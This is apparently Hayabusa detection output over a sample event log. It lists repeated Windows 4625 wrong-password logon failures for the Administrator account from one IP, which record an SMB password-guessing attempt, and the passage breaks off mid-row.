+2016-09-19 16:51:09.212 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GETwMERLpiVtMRkw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.248 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bhas9Vjc193EVcOg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.288 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OmVAnxq39t7qbcEs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.332 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 13y2nnltjipwZqth | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.369 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wDQrPBL1VodIcQLR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.417 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0Mp4jXeHd3b0CLw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.472 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3j89GmIDnG4v7JJC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.512 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyRLZMoaXJUrPPfn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.607 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZcoyOKUjEi1uCSpD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.648 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jWQGVJLcVwgf4YJ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.688 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mrFqG85mmjTYJ4A9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.728 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6DqIh1QHTk470nrU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.774 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feVbA94p6iT2pBeC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.804 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T30YHcE8ZG7FaxW7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.847 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RaKHRwYtx2lGtOCG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.884 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zDEDuMmlDZZfdkFD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.935 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CObqGJQi1hOOI83J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.002 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhsE9bQeEwW21bAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.050 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: El1qxgjvGS0QSS4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.097 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vtlr3HwzJcAfSxuO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.141 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KDayr44iXmE63vqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.195 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkNoLVOhnS8ayujK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.252 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3ggg78jjziKqijrT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.313 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BodeSVqeqa5qBQDL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.362 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yY7yxEcuGwWSJZV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.406 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oTlg6cvsz6Z6QpCp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.460 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3pTALzqu4Ok6CUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.509 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kdGagQIEcvQQMp4n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.557 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fVu4reOyQEIkChHO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.609 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EJWNS69MmMGLSnHc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.656 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nPaR2sBxPPCjxpL0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.706 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kJJ9A1EfqM4V2TRv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.760 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4dxf59xjpxO3oG17 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.804 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6dMI12g4tjSF8PX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.841 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZAqN0xPaW4jg2Kjc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.884 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mcnReyIEaqsQfowV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.928 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: akOH8Y7XdjOpqTez | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.967 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b0HOK1TIqloud7gh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.996 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n6uIAK55BmTnA6Bf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.042 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZDnn6QmLOJ6KwzKt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.084 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: np8KaRJvRqBrGyFL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.128 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dxbu69Amr6gWN5Hw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.164 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LoZdaFJWNON8Ujnc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.212 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q4RSlXgOS7sssCqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.252 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2PJprE7olK4pjrx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.297 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jQOAUcWQL32y2gGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.361 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nXI0wWwzhHN0uvOP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.414 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ujGqTzfOhmKgoAjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.468 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cFoPtWZ03O3ZZgOC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.520 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EyO2VTnpGZLeSIvr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.560 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ua69MEWABQ9hsooT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.608 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ubPQWn4nQYr3rXr8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.650 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xrgATdNqkA44nKqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.688 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKwktiUfTWakNx3I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.728 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xVebPFnWhbZKIANs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.776 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IyV8stIvfXLJQpsn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.813 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uStfvm0y0eZrWONH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.920 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUwTyUXe8NLG7bCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.967 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HQuDp8aZpWDANKMe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.004 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GQKTlzx2gq9ayAtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.061 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tCzVponBvb9mbyIr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.115 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mSwnrFv90KjN2cqj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.161 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QX5TLs2MPkia1cmk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.200 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ammLKlG1Q5awQGvN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.235 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJ1ijJjPJbF4uFlo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.277 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZOLnwIzpGz03Yjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.320 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xS8U3UQNz6l0LZn0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.361 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: no6cftQ5MF1fjZ0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.392 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5WHS6jVRnCUH0Rb5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.437 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i3oGLwrCJXJOauf6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.477 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1sxPrDYV3rr4pGJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.523 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Osysh2O2A3A2bN22 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.564 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FsInW9EMJZU8FOrF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.605 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ge8do8TM4GG1atMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.641 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4w5GLbpVsAhGqCiq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.688 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8eQXeW1VpRU0ptMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.728 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhLosoA2parzTnW9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.768 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MCFTP4gVGEKFKuRI | IP Addr: 192.168.198.149 | AuthPackage: 